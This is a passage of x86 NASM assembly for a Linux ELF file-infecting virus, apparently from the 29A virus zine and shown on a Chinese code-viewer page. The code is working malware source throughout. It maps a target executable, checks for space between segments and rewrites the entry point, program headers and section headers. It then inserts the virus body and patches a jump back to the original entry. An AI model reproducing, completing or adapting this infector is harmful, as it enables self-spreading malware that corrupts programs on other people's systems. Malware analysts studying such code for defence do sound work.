📄 29a-7.018
字号:
push string5 ;;;debug
call printf
add esp,8 ;;;
%endif
;;map the file into memory [void* mmap(start,length,prot,flags,fd,offset)]
;; in file <asm/mman.h>
;;the arguments stay in a struct that I create in the stack
;; mmap_arg_struct in file <usr/src/linux/arch/i386/kernel/sys_i386.c>
mmap:
mov eax,90
mov ecx,[esp+STACK2-8] ;filelength
mov edx,[esp+STACK2-4] ;fd
sub esp,24 ;alloc size of struct mmap_arg_struct
mov dword [esp],0 ;start
mov [esp+4],ecx ;len
mov dword [esp+8],3 ;prot READ-WRITE
mov dword [esp+12],2 ;flag MAP_PRIVATE
mov [esp+16],edx ;fd
mov dword [esp+20],0 ;offset
mov ebx,esp
int 0x80 ;;mmap system call(eax=90,ebx=ptr to mmap_arg_struct)
add esp,24
cmp eax,-1
jne c_mmap
jmp mmap_error
c_mmap:
mov [esp+STACK2-12],eax ;;;;;;;;;;;;;;[esp+STACK2-12]=pointer to mapped file
%ifdef DEBUG
push eax ;;;debug
push string6
call printf
add esp,8
%endif
;end mmap
;;is suitable(if ELF and there is space for virus in memory)
is_suitable:
;scas (scan strings ELF) or repe
;but I coompare only the first 4 bytes ( a dword),so:
mov edx,[esp+STACK2-12] ;ptr mapped
mov ebx,[edx] ;.ELF
mov eax,0x464c457f ;45=E,4c=L,46=F
%ifdef DEBUG
push eax
push ebx
push string12
call printf
add esp,4
pop ebx
pop eax
%endif
cmp ebx,eax
je c1_is_suitable
error_suitable:
jmp suit_error
c1_is_suitable:
;now read the ehdr (I need these informations first), but
;TODO: I don't want e_phoff or e_shoff > filesz and entry out off range
read_ehdr:
mov ebx,[esp+STACK2-8] ;file len
cmp ebx,0x130
jl error_suitable ;error file size too small
c_ehdr:
mov esi,[esp+STACK2-12] ;ptr mapped
mov eax,[esi+0x18]
mov [esp+STACK2-16],eax ;;;;;;;;;;;;;;;;[esp+STACK2-16]=e_entry
mov eax,[esi+0x1c]
mov [esp+STACK2-20],eax ;;;;;;;;;;;;;;;;[esp+STACK2-20]=e_phoff
mov eax,[esi+0x20]
mov [esp+STACK2-24],eax ;;;;;;;;;;;;;;;;[esp+STACK2-24]=e_shoff
mov eax,dword [esi+0x2c]
;else save only word, but after don't pop eax
and eax,0xffff ;only 2 bytes
mov [esp+STACK2-28], eax ;;;;;;;;;;;;;;;;[esp+STACK2-28]=e_phnum
mov eax,dword [esi+0x30]
and eax,0xffff
mov [esp+STACK2-32],eax ;;;;;;;;;;;;;;;;[esp+STACK2-32]=e_shnum
%ifdef DEBUG
push dword [esp+STACK2-16]
push string3
call printf
add esp,8
push dword [esp+STACK2-20]
push string3
call printf
add esp,8
push dword [esp+STACK2-24]
push string3
call printf
add esp,8
push dword [esp+STACK2-28]
push string3
call printf
add esp,8
push dword [esp+STACK2-32]
push string3
call printf
add esp,8
%endif
;end read_ehdr
is_suitable_space:
;look if there is space between end of section 2 and begin of 3
mov esi,[esp+STACK2-12] ;ptr to mapped
mov ebx,[esp+STACK2-20] ;e_phoff
add esi,ebx ;ph[0]
mov ecx,[esi+32*3+8] ;ph[3].p_vaddr
mov ebx,[esi+32*2+16] ;ph[2].p_filesz
mov [esp+STACK2-36],ebx ;;;;;;;;;;;;;;;;[esp+STACK2-36]=ph[2].p_filesz
add ebx,[esi+32*2+8] ;ph[2].p_vaddr
sub ecx,ebx ;ph[3].p_vaddr-ph[2].p_vaddr-ph[2].p_filesz
;verify ecx > VIRUS_SIZE
mov eax,VIRUS_SIZE
cmp ecx,eax
jl error_suitable ;exit ;;there is not space to write virus
%ifdef DEBUG
push ecx
push string10
call printf
add esp,8
%endif
;---------here I look it I have more than 3 ph, else file is not
;_________compiled with gcc, but for example with ld (and I assume
;_________ph[2] is the text section
mov ebx,[esp+STACK2-28] ;e_phnum
cmp ebx,5
jl error_suitable
;end is_suitable_space
;end is_suitable
patch_ehdr:
patch_e_entry:
;the new e_entry will be where the code section finish
mov ebx,0x08048000
add ebx,[esp+STACK2-36] ;ebx<-new entry
mov esi,[esp+STACK2-12] ;ptr mapped
mov [esi+0x18],ebx ;fix entry
;end patch_e_entry
patch_e_sh_offset:
add dword [esi+32],VIRUS_SIZE
;end patch_e_sh_offset
patch_phdrs:
%ifdef DEBUG
push dword [esp+STACK2-36] ;;debug
push string1
call printf ;;debug
add esp,8
%endif
mov ecx,[esp+STACK2-28] ;e_phnum
mov edx,[esp+STACK2-20] ;e_phoff
mov esi,[esp+STACK2-12] ;ptr to mapped
add esi,edx ;ph[0]
mov eax,[esp+STACK2-36] ;insertion_offset
l_read_ph:
cmp dword [esi+4],0 ;.text ph
jne dont_patch_phtext
;here patch .text ph
add dword [esi+16],VIRUS_SIZE ;patch p_filesz
add dword [esi+20],VIRUS_SIZE ;patch p_memsz
dont_patch_phtext:
cmp eax,[esi+4] ;if offset <= insertion_offset patch ->jg dont...
jg dont_patch_ph
;here patch phs at offset >= insertion_offset
add dword [esi+4],VIRUS_SIZE ;patch p_offset
dont_patch_ph:
%ifdef DEBUG
push eax
push ecx
push string7
call printf
add esp,4
push dword [esi+4]
push string11 ;p_offset
call printf
add esp,8
push dword [esi+16]
push string9 ;p_filesz
call printf
add esp,8
push dword [esi+20]
push string13 ;p_memsz
call printf
add esp,8
pop ecx
pop eax
%endif
add esi,0x20 ;next ph
loop l_read_ph
;end patch_phdrs
patch_shdrs:
mov ecx,[esp+STACK2-32] ;e_shnum (loop counter)
mov edx,[esp+STACK2-24] ;e_shoff
mov esi,[esp+STACK2-12] ;ptr mapped
add esi,edx ;sh[0]
mov eax,[esp+STACK2-36] ;insertion_offset
l_read_sh:
mov ebx,[esi+16] ;sh_offset ;;;;;;;;;;;;patch .text
add ebx,[esi+20] ;sh_size
cmp ebx,eax ;sh.sh_offset+sh.sh_size-insertion_size
jne dont_patch_shtext
;patch .text
add dword [esi+20],VIRUS_SIZE ;patch sh_size
dont_patch_shtext:
cmp [esi+16],eax ;sh_offset < insertion_offset -> don't patch
jl dont_patch_sh
;patch sh
add dword [esi+16],VIRUS_SIZE ;patch sh_offset
dont_patch_sh:
%ifdef DEBUG
push eax
push ecx
push string7
call printf
add esp,4
push dword [esi+16]
push string15 ;sh_offset
call printf
add esp,8
push dword [esi+20]
push string16 ;sh_size
call printf
add esp,8
pop ecx
pop eax
%endif
add esi,40 ;next sh
loop l_read_sh
;end patch_shdrs
find_current_entry_point: ;so I'll copy this code into the infected
mov esi,dword [0x08048018] ;current entry
%ifdef DEBUG
push esi
push string17
call printf
add esp,8
%endif
;end find_current_entry_point
write:
;open the file for writing
;mov eax,5
;mov ebx,[esp+STACK2-44] ;filename infected
;mov ecx,101q ;write-create-truncate
;mov edx,555q ;read-execute from all
;int 0x80
mov eax,[esp+STACK2-4] ;<---old fd
mov [esp+STACK2-40],eax ;;;;;;;;;;;;[esp+STACK2-40]=write fd
;write before insertion
mov ebx,eax ;fd
mov eax,4
mov ecx,[esp+STACK2-12] ;mapped
mov edx,[esp+STACK2-36] ;insertion_offset
int 0x80 ;;write first before insertion_offset
;write virus
mov eax,4
mov ecx,esi ;entry point address
mov edx,VIRUS_SIZE ;virus length
int 0x80 ;;write the virus at insertion_offset
;perhaps I have written less then VIRUS_SIZE bytes, so I have to
;seek the fd of VIRUS_SIZE more then the insertion_offset
mov eax,19
mov ecx,[esp+STACK2-36] ;insertion_offset
add ecx,VIRUS_SIZE
mov edx,0 ;SEEK_SET
int 0x80 ;SYS lseek
;write after insertion (assume ebx=fd)
mov ecx,[esp+STACK2-36] ;insertion_offset
mov edx,[esp+STACK2-8] ;total file length
sub edx,ecx ;remaining length to write
mov eax,4
add ecx,[esp+STACK2-12] ;mapped
int 0x80 ;;write at end after insertion_offset
;fix jmp to old entry point (instead of exit) and jmp offsets
;seek the fd at insertion_offset+0xb7,
;where I'll put a jump to old entry point
mov eax,19
mov ecx,[esp+STACK2-36] ;insertion_offset
add ecx,0xb7 ;it is the *jmp ahah* eheh
mov edx,0 ;SEEK_SET
int 0x80 ;SYS lseek
%ifdef DEBUG
push ebx
push ecx
push string20
call printf
add esp,4
pop ecx
pop ebx
%endif
;write the address to jmp (assume ebx=fd)
add ecx,0x08048004 ;address where instruction finish
mov edx,[esp+STACK2-16] ;old_entry
sub edx,ecx
push edx ;the opaddress part
mov ecx,esp
mov edx,4
mov eax,4
int 0x80 ;SYS write
add esp,4
;end fix
;end write
suit_error:
munmap:
mov eax,91
mov ebx,[esp+STACK2-12] ;ptr to map
mov ecx,[esp+STACK2-8] ;map length
int 0x80
;;close the file
mmap_error:
close:
mov eax,6
mov ebx,[esp+STACK2-4] ;fd
int 0x80 ;close
;;exit
open_error:
__exit:
add esp,STACK2 ;restore the stack allocated at the beginning
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;end main;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;data in section text;;;;;;;;;;;;;;;;;;;;;;;;;;
%ifdef DEBUG
string1: db 'fd=%d',10,0
string2: db 10,0
string3: db '0x%X',10,0
string4: db 'at offset 0x%X there is: ',0
string5: db 'file size=%dbytes',10,0
string6: db 'mmap ptr=0x%X',10,0
string7: db 'ecx=%d',10,0
string8: db 'ebp = 0x%X',10,0
string9: db 'filesz = 0x%X',10,0
string10: db 'free space for insertion = 0x%X',10,0
string11: db 'offset = 0x%X',10,0
string12: db 'signatureELF = 0x%X',10,0
string13: db 'p_memsz = 0x%X',10,0
string14: db '--------------------',10,0
string15: db 'sh_offset = 0x%X',10,0
string16: db 'sh_size = 0x%X',10,0
string17: db 'entry = 0x%X',10,0
string20: db 'seekKKKk to 0x%X',10,0
infected: db 'infected',0
off_table: ;table with the file offsets where I want to look
dd 0x18 ;entry point (e_entry)
dd 0x1c ;program header offset (e_phoff)
dd 0x20 ;section header offset (e_shoff)
dd 0x2c ;number of phs (e_phnum) (only 2 bytes!!!)
dd 0x30 ;number of shs (e_shnum) (only 2 bytes!!!)
dd 0 ;end of table
%endif
;I let some words
section .data
db 'hello, nice boys, I hope you will enjoy this program written with nasm.I want to say thanks to all my programmers friend.Bye from Gildo.',0
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -